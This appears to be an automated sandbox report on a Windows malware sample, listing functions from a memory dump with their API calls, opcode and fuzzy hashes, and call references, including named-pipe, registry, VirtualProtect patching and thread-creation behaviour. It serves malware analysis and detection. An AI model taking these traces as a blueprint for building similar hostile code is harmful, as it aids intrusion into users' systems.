  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
